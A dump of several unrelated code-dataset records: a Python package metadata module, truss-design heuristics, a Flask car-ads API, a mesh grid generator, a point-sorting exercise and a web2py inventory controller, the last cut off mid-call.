misakifont.println(time.strftime('%H:%M:%S'))\n misakifont.println(ipaddr().ip_addr())\n","sub_path":"MisakiFont/MisakiFont.py","file_name":"MisakiFont.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"450585034","text":"import sys\n\nfrom .api import Distribution, PackageNotFoundError # noqa: F401\nfrom importlib import import_module\n\nfrom . import _common\nfrom ._common import entry_points\n\n__all__ = [\n 'distribution',\n 'entry_points',\n 'resolve',\n 'version',\n ]\n\n\ndef distribution(package):\n \"\"\"Get the ``Distribution`` instance for the given package.\n\n :param package: The module object for the package or the name of the\n package as a string.\n :return: A ``Distribution`` instance (or subclass thereof).\n \"\"\"\n return Distribution.from_name(package)\n\n\ndef version(package):\n \"\"\"Get the version string for the named package.\n\n :param package: The module object for the package or the name of the\n package as a string.\n :return: The version string for the package as defined in the package's\n \"Version\" metadata key.\n \"\"\"\n return distribution(package).version\n\n\ndef resolve(entry_point):\n \"\"\"Resolve an entry point string into the named callable.\n\n :param entry_point: An entry point string of the form\n `path.to.module:callable`.\n :return: The actual callable object `path.to.module.callable`\n :raises ValueError: When `entry_point` doesn't have the proper format.\n \"\"\"\n path, colon, name = entry_point.rpartition(':')\n if colon != ':':\n raise ValueError('Not an entry point: {}'.format(entry_point))\n module = import_module(path)\n return getattr(module, name)\n\n\ndef _install():\n \"\"\"Install the appropriate sys.meta_path finder for the Python version.\"\"\"\n sys.meta_path.append(_common.MetadataPathFinder)\n sys.meta_path.append(_common.WheelMetadataFinder)\n\n\n_install()\n\n__version__ = version(__name__)\n","sub_path":"venv/lib/python3.7/site-packages/importlib_metadata/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"449191836","text":"import numpy as np\nimport networkx as nx\n\n__all__ = ['findLineSegIntersection', 'findOrientation', 'feasibility', 'stability', 'orientation', 'triangles', 'density', 'threeStars', 'createGraph']\n\ndef findLineSegIntersection(p1,q1,p2,q2):\n# This boolean function determines whether two line segments intersect,\n# given their endpoints as inputs\n\tif (findOrientation(p1,q1,p2) != findOrientation(p1,q1,q2)) and (findOrientation(p2,q2,p1) != findOrientation(p2,q2,q1)):\n\t\tif np.all(np.isclose(p1,p2)) or np.all(np.isclose(q1,q2)) or np.all(np.isclose(p1,q2)) or np.all(np.isclose(q1,p2)):\n\t\t\tintersect = False; \n\t\telse:\n\t\t\tintersect = True;\n\telse:\n\t\tintersect = False;\n\t\n\treturn intersect\n\ndef findSlope(x1, y1, x2, y2):\n\tden = x2-x1\n\tnum = y2-y1\n\tm = num/den if den!=0 else 1000;\n\treturn m\n\ndef findAngles(NC, CA):\n# This function computes the orientation angle wrt x-axis for elements in CA\n# Inputs: nodal position matrix NC \n# Design Connectivity Array CA_des \n\tx1 = NC[CA[:,0],0]\n\ty1 = NC[CA[:,0],1]\n\tx2 = NC[CA[:,1],0]\n\ty2= NC[CA[:,1],1]\n\n\tL = np.sqrt((x2-x1)**2+(y2-y1)**2);\n\tangles = np.arccos((x2-x1)/L);\n\n\treturn angles\n\ndef createGraph(NC, CA):\n\tG = nx.Graph()\n\tG.add_nodes_from(range(9))\n\tG.add_edges_from(CA)\n\treturn G\n\ndef triangles(NC, CA):\n# This function returns the number of triangles in the design\n\tG = createGraph(NC, CA)\n\treturn sum(nx.triangles(G).values())/3\n\ndef density(NC, CA):\n\tG = createGraph(NC, CA)\n\treturn nx.density(G)\n\ndef threeStars(NC, CA):\n\tG = createGraph(NC, CA)\n\tstars = np.array(list(dict(nx.degree(G)).values()))\n\treturn sum(stars==3)\n\ndef orientation(NC, CA, target=[0, 20]):\n# This function returns the number of elements with orientation between the given range\n# Inputs: nodal position matrix NC \n# Design Connectivity Array CA_des\n#\t\t End angles in degrees range = [deg deg]; Angles should be between [0, 180] degrees\n\tc= np.pi/180\n\tangles = findAngles(NC, CA)\n\treturn sum((angles>=c*target[0]) & (angles<=c*target[1]))\n\ndef findOrientation(p,q,r):\n# This function finds the orientation of an ordered triplet (p, q, r)\n# The function returns one of three following values:\n# 0 --> p, q and r are colinear \n# 1 --> Clockwise \n# 2 --> Counterclockwise \n\tval = (q[1]-p[1])*(r[0]-q[0])-(q[0]-p[0])*(r[1]-q[1]);\n\tif val == 0:\n\t\torientation = 0;\n\telif val > 0:\n\t\torientation = 1;\n\telse:\n\t\torientation = 2;\n\t\n\treturn orientation\n\ndef feasibility(NC,CA_des):\n# This function computes the feasibility score for a design \n# Inputs: nodal position matrix NC \n# Design Connectivity Array CA_des \n\tfeasibilityScore = 1;\n\n\t# FIRST CONSTRAINT: members only intersect at nodes (no crossing)\n\t# Sort points from left to right by x-position\n\tSortedCA = CA_des[np.argsort(CA_des, axis=0)[:,0]]\n\t\n\t# Develop 4xM matrix of line segment endpoint coordinates, where M is \n\t# the number of truss members. Each row of format (x1,y1,x2,y2),\n\t# where point 1 is leftmost, point 2 is rightmost\n\tPosA = np.vstack([ NC[SortedCA[:,0],0], NC[SortedCA[:,0],1], NC[SortedCA[:,1],0], NC[SortedCA[:,1],1] ]).T;\n\n\t# Loop through each pair of elements\n\tfor i in range(PosA.shape[0]):\n\t\tfor j in range(PosA.shape[0]):\n\t\t\tif i==j:\n\t\t\t\tcontinue\n\t\t\t# Determine whether the given pair of elements intersects\n\t\t\tintersect = findLineSegIntersection([PosA[i,0],PosA[i,1]],[PosA[i,2],PosA[i,3]],[PosA[j,0],PosA[j,1]],[PosA[j,2],PosA[j,3]]);\n\t\t\t# Throw an error, given an intersection\n\t\t\tif intersect == True:\n\t\t\t\tfeasibilityScore = feasibilityScore - 0.05;\n\t\t\t\tif feasibilityScore < 0.05:\n\t\t\t\t\treturn feasibilityScore\n\t\t\t\t#{\n\t\t\t\t# print(i, j)\n\t\t\t\tD = ['The element from ('+str(PosA[i,0])+','+\n\t\t\t\t\t str(PosA[i,1])+') to ('+str(PosA[i,2])+\n\t\t\t\t\t ','+str(PosA[i,3])+') intersects with the' +\n\t\t\t\t\t ' element from (',str(PosA[j,0])+',' +\n\t\t\t\t\t str(PosA[j,1])+') to (',str(PosA[j,2])+','+\n\t\t\t\t\t str(PosA[j,3])+')'];\n\t\t\t\t# print(D);\n\t\t\t\t#}\n\t\t\t\t\n\t\t# This constraint is not included in this version because the definition of edges does not allow overallping.\n\t# SECOND CONSTRAINT: Elements (of either the same or different lengths) \n\t# cannot overlap\n\t# Loop through each element\n\t# for k in range(SortedCA.shape[0]):\n\t# \t# Loop through each element again, to consider each possible pair \n\t# \t# of elements\n\t# \tmk = findSlope(NC[SortedCA[k,0],0], NC[SortedCA[k,0],1], NC[SortedCA[k,1],0], NC[SortedCA[k,1],1]);\n\n\t# \tfor q in range(SortedCA.shape[0]):\n\t# \t\t# If the same element is being compared twice, move on\n\t# \t\tif k == q:\n\t# \t\t\tcontinue\n\n\t# \t\t# Check if both elements share a common startpoint\n\t# \t\tif (NC[SortedCA[k,0],0] == NC[SortedCA[q,0],0]) and (NC[SortedCA[k,0],1] == NC[SortedCA[q,0],1]):\n\t# \t\t\t# Check if both elements have the same slope (and reject \n\t# \t\t\t# the design if so)\n\t# \t\t\tmq = findSlope(NC[SortedCA[q,0],0], NC[SortedCA[q,0],1], NC[SortedCA[q,1],0], NC[SortedCA[q,1],1]);\n\t\t\t\t\n\t# \t\t\tif mk == mq:\n\t# \t\t\t feasibilityScore = feasibilityScore - 0.1;\n\t# \t\t\t if feasibilityScore < 0.1:\n\t# \t\t\t\t return feasibilityScore\n\t\t\t\t \n\t# \t\t\t #{\n\t# \t\t\t D = ['The element from ('+str(PosA[k,0])+','+\n\t# \t\t\t\t str(PosA[k,1])+') to ('+str(PosA[k,2])+\n\t# \t\t\t\t ','+str(PosA[k,3])+') overlaps with the'+\n\t# \t\t\t\t ' element from ('+str(PosA[q,0])+','+\n\t# \t\t\t\t str(PosA[q,1])+') to ('+str(PosA[q,2])+','+\n\t# \t\t\t\t str(PosA[q,3])+')'];\n\t\t\t\t # print(D);\n\t\t\t\t #}\n\n\t# THIRD CONSTRAINT: Metamaterial should be connected.\n\t# The bottom layer and the top layer should be connected at at least one node.\n\t# Left layer and right layer should be connected at at least one node\n\tG = createGraph(NC, SortedCA)\n\tconnected_components = list(nx.connected_components(G))\n\thorz_connecting_nodes = [[0,6], [1,7], [2,8]]\n\tvert_connecting_nodes = [[0,2], [3,5], [6,8]]\n\tdiag_connecting_nodes = [[[1,5], [3,7]], [[1,3], [5,7]], [[0,8],[0,8]], [[2,6],[2,6]]]\n\n\thorz_bool = []\n\tvert_bool = []\n\tdiag_bool = []\n\n\tfor g in connected_components:\n\t\tg = list(g)\n\t\thorz_bool.append(np.any(np.all(np.isin(horz_connecting_nodes, g), axis=1)))\n\t\tvert_bool.append(np.any(np.all(np.isin(vert_connecting_nodes, g), axis=1)))\n\t\tdiag_bool.append(np.all(np.isin(diag_connecting_nodes, g), axis=-1))\n\n\thorz_bool = np.array(horz_bool)\n\tvert_bool = np.array(vert_bool)\n\tdiag_bool = np.all(np.any(np.array(diag_bool), axis=0), axis=-1)\n\n\t# diagonal_connecting_nodes = [[[1,5], [3, 7]], [[1,3], [5,7]]]\n\t# connecting_diagonal_pair_present = any([ all(ls in SortedCA.tolist() for ls in lists) for lists in diagonal_connecting_nodes])\n\n\tif sum([np.any(diag_bool), np.any(horz_bool), np.any(vert_bool)])<2:\n\t\tif np.all(~horz_bool):\n\t\t\tfeasibilityScore = feasibilityScore - 0.1;\n\t\t\tif feasibilityScore < 0.1:\n\t\t\t\treturn feasibilityScore\n\t\tif np.all(~vert_bool):\n\t\t\tfeasibilityScore = feasibilityScore - 0.1;\n\t\t\tif feasibilityScore < 0.1:\n\t\t\t\treturn feasibilityScore\n\n\treturn np.around(feasibilityScore,2)\n\n# FUNCTION TO TEST 2D TRUSS STABILITY \ndef stability(sidenum,CA,NC):\n\t# Initialize stability score\n\tstabilityScore = 1;\n\n\t# Add up counters based on nodal connectivities\n\tN,_ = np.histogram(CA, NC.shape[0]);\n\t\n\t# First stability check: number of \"holes\" (unconnected nodes) in truss\n\t# should be less than or equal to [(number of side nodes) - 2]\n\tzeros = np.argwhere(N==0);\n\tif np.sum(zeros) > (sidenum-2):\n\t\tstabilityScore = stabilityScore - 0.1;\n\t\tif stabilityScore < 0.1:\n\t\t\treturn stabilityScore\n\t\n\t# Second stability check: nodes with connections are connected to at\n\t# least three other nodes apiece (except for the corner nodes)\n\tidx = np.r_[1:(sidenum-2), sidenum:(sidenum**2-sidenum-1), (sidenum**2-(sidenum-2)-1):(sidenum**2-2)]\n\tNs = N[idx];\n\tNnz = Ns[Ns>0];\n\tfor a in range(len(Nnz)):\n\t if (Nnz[a] == 1) or (Nnz[a] == 2):\n\t\t stabilityScore = stabilityScore - 0.1;\n\t\t if stabilityScore < 0.1:\n\t\t\t return stabilityScore\n\t\n\t# Third stability check: corner nodes have at least two connections\n\tNc = N[[0, sidenum-1, sidenum^2-sidenum-1, sidenum^2-1]];\n\tfor a in range(len(Nc)):\n\t if Nc[a] == 1:\n\t\t stabilityScore = stabilityScore - 0.2;\n\t\t if stabilityScore < 0.1:\n\t\t\t return stabilityScore;\n\t\n\t# Fourth stability check: at least one diagonal member present\n\tnodiags = True;\n\tfor i in range(CA.shape[0]):\n\t\tif CA[i,0]+sidenum == CA[i,1]:\n\t\t\tnodiags = True;\n\t\telif CA[i,0]-sidenum == CA[i,1]:\n\t\t\tnodiags = True;\n\t\telif CA[i,0]+1 == CA[i,1]:\n\t\t\tnodiags = True;\n\t\telif CA[i,0]-1 == CA[i,1]:\n\t\t\tnodiags = True;\n\t\telse:\n\t\t\tnodiags = False;\n\t\t\tbreak\n\t\t\n\tif nodiags == True:\n\t\tstabilityScore = stabilityScore - 0.2;\n\t\tif stabilityScore < 0.1:\n\t\t\treturn stabilityScore\n\t\n\t# Assign value to stability boolean\n\t#stabilityBool = true;\n\t#if stabilityScore < 1\n\t\t#stabilityBool = false;\n\t#end\n\treturn np.around(stabilityScore,2)","sub_path":"_static/design_evaluator/python/old/heuristics_updated.py","file_name":"heuristics_updated.py","file_ext":"py","file_size_in_byte":8653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"450980511","text":"from datetime import datetime\nfrom flask import Blueprint, jsonify, request\nfrom flask.views import MethodView\n\nfrom database import db\nfrom src.services.ads import AdsService, AdDoesNotExists\nfrom src.services.cars import CarsService, CarDoesNotExists\nfrom src.services.colors import ColorService\nfrom src.services.image import ImageService\nfrom src.services.tags import TagsService\nfrom src.tools import auth_required, seller_required, owner_required\n\nbp = Blueprint('ads', __name__)\n\n\ndef generation_ad_dict(ad_id: int) -> dict:\n \"\"\"Формирование словаря представления объявления\"\"\"\n with db.connection as connection:\n ad_service = AdsService(connection)\n response = ad_service.read_ad(ad_id)\n\n car_service = CarsService(connection)\n response[\"car\"] = car_service.read_car(ad_id=ad_id)\n\n color_service = ColorService(connection)\n response[\"car\"][\"color\"] = color_service.read_all_color(ad_id=ad_id)\n\n image_service = ImageService(connection)\n response[\"car\"][\"images\"] = image_service.read_image(ad_id=ad_id)\n\n tags_service = TagsService(connection)\n response[\"tags\"] = tags_service.read_tag(ad_id=ad_id)\n return response\n\n\nclass AdsView(MethodView):\n def get(self):\n \"\"\"Получение списка объявлений\"\"\"\n query_seller_id = request.args.get(\"seller_id\")\n query_tags = request.args.get(\"tags\")\n query_make = request.args.get(\"make\")\n query_model = request.args.get(\"model\")\n\n with db.connection as connection:\n ad_service = AdsService(connection)\n asd_id = ad_service.generation_id(seller_id=query_seller_id)\n\n ads = [generation_ad_dict(asd_id) for ad_id in asd_id]\n\n if query_make is not None:\n ads = list(filter(lambda x: x[\"car\"][\"make\"] == query_make, ads))\n\n if query_model is not None:\n ads = list(filter(lambda x: x[\"car\"][\"make\"] == query_make, ads))\n\n if query_tags is not None:\n query_tags = [tag.strip() for tag in query_tags.split(',')]\n ads = [\n ad\n for ad in ads\n for tag in ad[\"tags\"]\n if tag in query_tags\n ]\n\n return jsonify(ads)\n\n @auth_required\n @seller_required\n def post(self, user):\n \"\"\"Создание нового объявления\"\"\"\n request_json = request.json\n\n seller_id = user[\"seller_id\"]\n title = request_json.get('title')\n data = datetime.now().strftime(\"%A, %d. %B %Y %I:%M%p\")\n tags = request_json.get(\"tags\")\n car = request_json.get(\"car\")\n colors = car.get(\"color\")\n image = car.get(\"image\")\n\n with db.connection as connection:\n\n car_service = CarsService(connection)\n car_id = car_service.create(car)\n\n color_service = ColorService(connection)\n for color in colors:\n color_service.add_to_car_color(color, car_id)\n\n image_service = ImageService(connection)\n for image_data in image:\n image_service.update_image(image_data, car_id)\n\n ads_serivce = AdsService(connection)\n ad_id = ads_serivce.create_ad(seller_id, car_id, title, data)\n\n tag_service = TagsService(connection)\n for tag in tags:\n tag_service.add_to_ad(tag, ad_id)\n\n return jsonify(generation_ad_dict(ad_id)), 201\n\n\nclass AdView(MethodView):\n def get(self, ad_id):\n \"\"\"Получение объявления с указанным id\"\"\"\n try:\n response = generation_ad_dict(ad_id)\n except AdDoesNotExists:\n return '', 404\n return jsonify(response)\n\n @auth_required\n @seller_required\n @owner_required\n def delete(self, ad_id, user):\n \"\"\"Удаление объявления с указанным id\"\"\"\n with db.connection as connection:\n as_service = AdsService(connection)\n\n try:\n as_service.read_ad(ad_id)\n except AdDoesNotExists:\n pass\n else:\n as_service.delete_ad(ad_id)\n\n return '', 200\n\n @auth_required\n @seller_required\n @owner_required\n def patch(self, ad_id, user):\n \"\"\"Частичное редактирование объявления с указанным id\"\"\"\n request_json = request.json\n car_data = request_json.get(\"car\")\n\n with db.connection as connection:\n\n title = request_json.get(\"title\")\n if title is not None:\n as_service = AdsService(connection)\n as_service.update_ad(ad_id=ad_id, titile=title)\n\n tags = request_json[\"tags\"]\n tags_service = TagsService(connection)\n for tag in tags:\n tags_service.add_to_ad(tag, ad_id)\n\n car_service = CarsService(connection)\n car_id = car_service.get_id(ad_id=ad_id)\n try:\n car_service.update(car_id=car_id, data=car_data)\n except CarDoesNotExists:\n car_service.create(car_data)\n\n colors = car_data.get(\"colors\")\n car_service = ColorService(connection)\n for color in colors:\n car_service.add_to_car_color(color, car_id)\n\n images = car_data.get(\"images\")\n image_service = ImageService(connection)\n for image in images:\n image_service.update_image(image, car_id)\n\n return '', 204\n\n\nbp.add_url_rule('', view_func=AdsView.as_view('ads'))\nbp.add_url_rule('/<int:ad_id>', view_func=AdsView.as_view('ad'))\n","sub_path":"Lesson 13/final v 2.0/src/blueprints/ads.py","file_name":"ads.py","file_ext":"py","file_size_in_byte":5760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"140588100","text":"\"\"\"\nCreated at 22.08.2019\n\n@author: Michał Jureczka\n@author: Piotr Bartman\n\"\"\"\n\nimport numpy as np\nfrom simulation.grid import Grid\n\n\nclass GridFactory:\n @staticmethod\n def addPoint(grid, x, y, t):\n i = 0\n while i < len(grid.Points):\n if grid.Points[i][0] == x and grid.Points[i][1] == y:\n return\n else:\n i += 1\n grid.Points = np.append([[x, y, t]], grid.Points, axis=0)\n for i in range(0, len(grid.Edges)):\n grid.Edges[i][0] += 1\n grid.Edges[i][1] += 1\n\n @staticmethod\n def addEdge(grid, i, j, t): # zawsze(i,j) ma i<j na x lub x równe oraz i<j na y\n a = i\n b = j\n if (grid.Points[j][0] < grid.Points[i][0] or\n (grid.Points[j][0] == grid.Points[i][0] and grid.Points[j][1] < grid.Points[i][1])):\n a = j\n b = i\n grid.Edges = np.append([[a, b, t]], grid.Edges, axis=0)\n\n @staticmethod\n def startBorder(grid, x, y):\n GridFactory.addPoint(grid, x, y, 0)\n\n @staticmethod\n def addBorderD(grid, x, y):\n GridFactory.addPoint(grid, x, y, 1)\n GridFactory.addEdge(grid, 1, 0, 2)\n grid.BorderEdgesD += 1\n\n @staticmethod\n def addBorderDLast(grid, x, y):\n GridFactory.addPoint(grid, x, y, 2)\n GridFactory.addEdge(grid, 1, 0, 2)\n grid.BorderEdgesD += 1\n\n @staticmethod\n def addBorderNTop(grid, x, y):\n GridFactory.addPoint(grid, x, y, 3)\n GridFactory.addEdge(grid, 1, 0, 1)\n grid.BorderEdgesN += 1\n\n @staticmethod\n def addBorderNTopLast(grid, x, y):\n GridFactory.addPoint(grid, x, y, 4)\n GridFactory.addEdge(grid, 1, 0, 1)\n grid.BorderEdgesN += 1\n\n @staticmethod\n def addBorderNSide(grid, x, y):\n GridFactory.addPoint(grid, x, y, 5)\n GridFactory.addEdge(grid, 0, 1, 2)\n grid.BorderEdgesN += 1\n\n @staticmethod\n def addBorderNSideLast(grid, x, y):\n GridFactory.addPoint(grid, x, y, 6)\n GridFactory.addEdge(grid, 0, 1, 2)\n grid.BorderEdgesN += 1\n\n @staticmethod\n def addBorderC(grid, x, y):\n GridFactory.addPoint(grid, x, y, 7)\n GridFactory.addEdge(grid, 0, 1, 1)\n grid.BorderEdgesC += 1\n\n @staticmethod\n def stopBorder(grid):\n GridFactory.addEdge(grid, len(grid.Points) - 1, 0, 1)\n grid.BorderEdgesC += 1\n\n @staticmethod\n def construct(sizeH, sizeL, height):\n grid = Grid()\n grid.SizeH = sizeH\n grid.SizeL = sizeL\n grid.Height = height\n grid.longTriangleSide = float(height) / sizeH\n grid.Length = grid.longTriangleSide * sizeL\n\n grid.halfLongTriangleSide = float(grid.longTriangleSide) * 0.5\n grid.shortTriangleSide = float(grid.longTriangleSide) * np.sqrt(2) * 0.5\n grid.halfShortTriangleSide = float(grid.shortTriangleSide) * 0.5\n grid.TriangleArea = (grid.longTriangleSide * grid.longTriangleSide) / 4.\n\n GridFactory.startBorder(grid, 0, 0)\n\n for i in range(1, sizeH):\n GridFactory.addBorderD(grid, 0, float(i) * grid.longTriangleSide)\n GridFactory.addBorderDLast(grid, 0, float(sizeH) * grid.longTriangleSide)\n\n for i in range(1, sizeL):\n GridFactory.addBorderNTop(grid, float(i) * grid.longTriangleSide, height)\n GridFactory.addBorderNTopLast(grid, float(sizeL) * grid.longTriangleSide, height)\n\n for i in range(sizeH - 1, 0, -1):\n GridFactory.addBorderNSide(grid, grid.Length, float(i) * grid.longTriangleSide)\n GridFactory.addBorderNSideLast(grid, grid.Length, float(0))\n\n for i in range(sizeL - 1, 0, -1):\n GridFactory.addBorderC(grid, float(i) * grid.longTriangleSide, 0)\n\n GridFactory.stopBorder(grid)\n\n for i in range(0, sizeL):\n for j in range(1, sizeH):\n x1 = float(i) * grid.longTriangleSide\n x2 = float(i + 1) * float(grid.longTriangleSide)\n y = float(j) * grid.longTriangleSide\n GridFactory.addPoint(grid, x1, y, 8)\n GridFactory.addPoint(grid, x2, y, 8)\n a = grid.getPoint(x1, y)\n b = grid.getPoint(x2, y)\n GridFactory.addEdge(grid, a, b, 1)\n\n for i in range(1, sizeL):\n for j in range(0, sizeH):\n x = float(i) * grid.longTriangleSide\n y1 = float(j) * grid.longTriangleSide\n y2 = float(j + 1) * grid.longTriangleSide\n GridFactory.addPoint(grid, x, y1, 8)\n GridFactory.addPoint(grid, x, y2, 8)\n a = grid.getPoint(x, y1)\n b = grid.getPoint(x, y2)\n GridFactory.addEdge(grid, a, b, 2)\n\n for i in range(0, sizeL):\n for j in range(0, sizeH):\n x = (float(i) + 0.5) * grid.longTriangleSide\n y = (float(j) + 0.5) * grid.longTriangleSide\n GridFactory.addPoint(grid, x, y, 9)\n a = grid.getPoint(x, y)\n b = grid.getPoint((float(i)) * grid.longTriangleSide, (float(j) + 1.0) * grid.longTriangleSide)\n GridFactory.addEdge(grid, a, b, 5)\n b = grid.getPoint((float(i) + 1.0) * grid.longTriangleSide, (float(j) + 1.0) * grid.longTriangleSide)\n GridFactory.addEdge(grid, a, b, 4)\n b = grid.getPoint((float(i) + 1.0) * grid.longTriangleSide, (float(j)) * grid.longTriangleSide)\n GridFactory.addEdge(grid, a, b, 6)\n b = grid.getPoint((float(i)) * grid.longTriangleSide, (float(j)) * grid.longTriangleSide)\n GridFactory.addEdge(grid, a, b, 3)\n\n return grid\n","sub_path":"simulation/grid_factory.py","file_name":"grid_factory.py","file_ext":"py","file_size_in_byte":5705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"634255102","text":"class point:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __str__(self):\n return \"%s %s\" % (self.x, self.y)\n\n def __lt__(self, other):\n if self.x == other.x:\n return self.y <= other.y\n else:\n return self.x <= other.y\n\ninput_count = int(input())\ninput_points = list()\n\nfor index in range(0, input_count):\n input_list = [int(x) for x in input().split()]\n input_points.append(point(input_list[0], input_list[1]))\n\ninput_points.sort()\n\nfor input_point in input_points:\n print(input_point)\n","sub_path":"python3 풀이/좌표정렬하기/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"69942196","text":"# -*- coding: utf-8 -*-\nif 0:\n from gluon.globals import *\n from gluon.html import *\n from gluon.http import *\n from gluon.tools import Auth\n from gluon.sqlhtml import SQLFORM, SQLTABLE, form_factory\n session = Session()\n request = Request()\n response = Response()\n\n### required - do no delete\ndef user(): return dict(form=auth())\ndef download(): return response.download(request,db)\ndef call(): return service()\n### end requires\n\n\n\ndef index():\n return dict()\n\ndef error():\n return dict()\n\n@auth.requires_login()\ndef cliente():\n # presentacion de listado de clientes\n datasource = db(db.cliente.id>0).select()\n powerTable = plugins.powerTable\n powerTable.datasource = datasource\n powerTable.headers = 'labels'\n powerTable.showkeycolumn = False\n powerTable.dtfeatures['bJQueryUI'] = request.vars.get('jqueryui',True)\n powerTable.uitheme = request.vars.get('theme','Smoothness')\n powerTable.dtfeatures[\"sScrollY\"] = \"100%\"\n powerTable.dtfeatures[\"sScrollX\"] = \"100%\"\n powerTable.dtfeatures['sPaginationType'] = 'full_numbers'\n powerTable.dtfeatures[\"iDisplayLength\"] = 20\n # alta de clientes \n mystep = [dict(title='NUEVO CLIENTE',Legend='Ingrese los datos del nuevo cliente',\n fields=['empresa','contacto','telefono','correo'])]\n from plugin_PowerFormWizard import PowerFormWizard\n options = {'description':False,'legend':True,'validate':True}\n form = PowerFormWizard(db.cliente, steps=mystep, options=options)\n \n if form.accepts(request.vars, session):\n response.flash = \"registro aceptado\"\n elif form.errors:\n form.step_validation()\n response.flash = \"error en los datos\"\n return dict( table=powerTable.create(),form=form) \n \n@auth.requires_login()\ndef categoria():\n # presentacion de categorias de articulosss\n datasource = db(db.categoria.id>0).select()\n powerTable = plugins.powerTable\n powerTable.datasource = datasource\n powerTable.headers = 'labels'\n powerTable.showkeycolumn = False\n powerTable.dtfeatures['bJQueryUI'] = request.vars.get('jqueryui',True)\n powerTable.uitheme = request.vars.get('theme','Smoothness')\n powerTable.dtfeatures[\"sScrollY\"] = \"100%\"\n powerTable.dtfeatures[\"sScrollX\"] = \"100%\"\n powerTable.dtfeatures['sPaginationType'] = 'full_numbers'\n powerTable.dtfeatures[\"iDisplayLength\"] = 30\n # alta de categoria de articulos\n mystep = [dict(title='NUEVAS CATEGORIAS',Legend='Ingrese una Categoria para Agrupar artículos',fields=['name'])]\n from plugin_PowerFormWizard import PowerFormWizard\n options = {'description':False,'legend':True,'validate':True}\n form = PowerFormWizard(db.categoria, steps=mystep, options=options)\n \n if form.accepts(request.vars, session):\n response.flash = \"registro aceptado\"\n elif form.errors:\n form.step_validation()\n response.flash = \"error en los datos\"\n return dict( table=powerTable.create(),form=form)\n\n@auth.requires_login()\ndef articulo():\n \n # presentacion de tabla de articulos ############ \n datasource = db(db.articulo.id>0).select()\n powerTable = plugins.powerTable\n powerTable.datasource = datasource\n powerTable.headers = 'labels'\n powerTable.showkeycolumn = False\n powerTable.dtfeatures['bJQueryUI'] = request.vars.get('jqueryui',True)\n powerTable.uitheme = request.vars.get('theme','Smoothness')\n powerTable.dtfeatures[\"sScrollY\"] = \"100%\"\n powerTable.dtfeatures[\"sScrollX\"] = \"100%\"\n powerTable.dtfeatures['sPaginationType'] = 'full_numbers'\n powerTable.dtfeatures[\"iDisplayLength\"] = 10\n powerTable.extrajs = dict(autoresize={},\n tooltip={},\n details={'detailscolumns':'articulo.memo'}\n )\n powerTable.keycolumn = 'articulo.id'\n powerTable.columns = ['articulo.descripcion','articulo.link',\n 'articulo.precio','articulo.categoria']\n # alta de articulos #################### \n mystep = [dict(title='NUEVOS ARTICULOS',Legend='Ingrese los datos del articulo',\n fields=['descripcion','memo','iva','precio','categoria'])]\n from plugin_PowerFormWizard import PowerFormWizard\n options = {'description':False,'legend':True,'validate':True}\n form = PowerFormWizard(db.articulo, steps=mystep, options=options)\n \n if form.accepts(request.vars, session):\n response.flash = \"registro aceptado\"\n elif form.errors:\n form.step_validation()\n response.flash = \"error en los datos\"\n return dict( table=powerTable.create(),form=form)\n\n\ndef features():\n from plugin_PowerGrid.CallBack import CallBack\n if (auth.has_membership(role='Admin')): \n return CallBack(db.movimientos.id>0 and (db.movimientos.fecha_devuelta==None or \n db.movimientos.estado == \"Parte En Poder de Técnico\"))\n elif (auth.has_membership(role='control')):\n return CallBack(db.movimientos.fecha_devuelta!=None and \n db.movimientos.estado != \"Parte En Poder de Técnico\")\n elif (auth.has_membership(role='usuario')):\n return CallBack(db.movimientos.fecha_devuelta==None or \n db.movimientos.estado == \"Parte En Poder de Técnico\")\n\n@auth.requires_login()\ndef presupuestos():\n \n \n from plugin_PowerGrid.PowerGrid import PowerGrid\n p = PowerGrid(\n callback=URL('default','features', extension='json'),\n buttons=[\n ##('details',URL('plugin_PowerGrid','data',args=['read','products'])+'/${id}','_blank','Details of Record ${id}','modal positive left button','magnifier',[600,500]),\n ('cargar comprobante',URL('plugin_PowerGrid','data',args=['update','movimientos'])+'/${id}','_blank','Editando Registro ${id}','refreshmodal middle button', 'pen',[600,800]),\n ##('delete',URL('plugin_PowerGrid','data',args=['delete','products'])+'/${id}','_blank','Are you sure you want to delete record ${id}','confirmationmodal right negative button', 'cross'),\n \n ],\n addurl=URL('plugin_PowerGrid','data',args=['create','movimientos']), \n addLabel='Add New Record', \n addTitle='You are adding a new record', \n headers=[['id','Codigo'],['entregado_x','Entrega: '], ['retirado_x','Retira'],\n ],\n \n #headers=[['entregado_x','Entrega: '], ['retirado_x','Retira'], ['id_articulo','Articulo'],['cantidad','Cantidad'],\n #['cliente','Usado en']],\n #hidecontrolbuttons=True,\n #hiderefreshbutton=True,\n hideaddbutton=True,\n #_id=\"banana\",\n #target=\"melancia\",\n #searchBy='equal',\n minH=800,\n options=dict(#colsWidth=[60,60,60],\n #width=700,\n #buttonBackTitle='Back',\n #buttonMax=4,\n #buttonNextTitle='Next',\n #success=\"\"\"js[function(){alert('Executed on success');}]js\"\"\",\n #before=\"\"\"js[function(){alert('Executed before');}]js\"\"\",\n #error=\"\"\"js[function(){alert('Executed on load error');}]js\"\"\",\n #buttonOption=False,\n #buttonsWidth=200\n #buttonTitle='oi',\n #clickFx=False,\n #debug=True,\n #find='name',search='J',\n #searchOption=False,\n searchButtonLabel='Buscar',\n searchButtonTitle='Clique para buscar',\n searchFocus=True,\n #cache=True,\n #contentType='application/x-www-form-urlencoded; charset=utf-8',\n #type='get',\n #dataType='jsonp',\n #jsonp=True,\n #jsonpCallback='callback',\n #findsName=[['name','name']],\n #hoverFx=False,\n #loadingOption=True,\n #loadingText='Carregando...',\n #messageOption=False,\n #noResultOption=False,\n noResultText='no se encontraron datos ',\n #page=1,\n #rows=3,\n #rowsNumber=[3,25],\n #params='&blablabla=45',\n #resize=False,\n 